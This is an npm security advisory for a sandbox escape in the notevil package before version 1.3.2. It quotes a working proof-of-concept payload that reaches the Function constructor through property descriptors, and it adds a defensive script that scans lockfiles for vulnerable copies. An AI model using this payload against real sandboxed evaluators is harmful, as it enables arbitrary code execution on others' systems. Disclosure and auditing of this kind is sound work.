## Description
Sandbox Breakout / Arbitrary Code Execution in notevil
Versions of notevil prior to 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to prevent access to the Function constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the Sandbox Escape. An example payload is:
```javascript
// Proof-of-concept payload quoted in the advisory
var safeEval = require('notevil')
var input = "" +
"function fn() {};" +
"var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" +
"var properties = Object.values(constructorProperty);" +
"properties.pop();" +
"properties.pop();" +
"properties.pop();" +
"var Function = properties.pop();" +
"(Function('return this'))()";
safeEval(input)
```
## Recommendation
Upgrade to version 1.3.2 or later.
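As an added example (not from the advisory or the notevil project), the script below audits a `package-lock.json` for every installed copy of notevil, including nested copies pulled in by other dependencies, and flags any version below the fixed release 1.3.2. The lockfile contents are constructed inline for illustration.

```javascript
// Added example: report notevil installs below the fixed version 1.3.2.
// Handles lockfileVersion 1 ("dependencies" tree) and 2/3 ("packages" map).

const FIXED_VERSION = '1.3.2';

// Compare two "major.minor.patch" strings (prerelease suffix ignored); returns -1, 0 or 1.
function compareSemver(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Affected range from the advisory: every version < 1.3.2.
function isAffected(version) {
  return compareSemver(version, FIXED_VERSION) < 0;
}

// Collect every notevil install from a parsed lockfile object.
function findNotevil(lock) {
  const found = [];
  const record = (path, version) => found.push({ path, version, affected: isAffected(version) });
  if (lock.packages) {
    // v2/v3 layout: keys look like "node_modules/foo/node_modules/notevil"
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === 'node_modules/notevil' || path.endsWith('/node_modules/notevil')) {
        record(path, meta.version);
      }
    }
  } else {
    // v1 layout: recursive "dependencies" tree
    (function walk(deps, prefix) {
      for (const [name, meta] of Object.entries(deps || {})) {
        const path = `${prefix}node_modules/${name}`;
        if (name === 'notevil') record(path, meta.version);
        walk(meta.dependencies, `${path}/`);
      }
    })(lock.dependencies, '');
  }
  return found;
}

// Constructed sample lockfile (v2 layout): one patched copy and one vulnerable nested copy.
const SAMPLE_LOCK = {
  lockfileVersion: 2,
  packages: {
    'node_modules/notevil': { version: '1.3.2' },
    'node_modules/some-plugin/node_modules/notevil': { version: '1.3.1' },
  },
};
```

Running `findNotevil(JSON.parse(fs.readFileSync('package-lock.json')))` on a real project gives the same per-path report; any entry with `affected: true` needs the upgrade even if the top-level copy is already patched.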
## Packages

| Name | Affected versions | Fixed version |
|---|---|---|
| notevil (npm) | < 1.3.2 | 1.3.2 |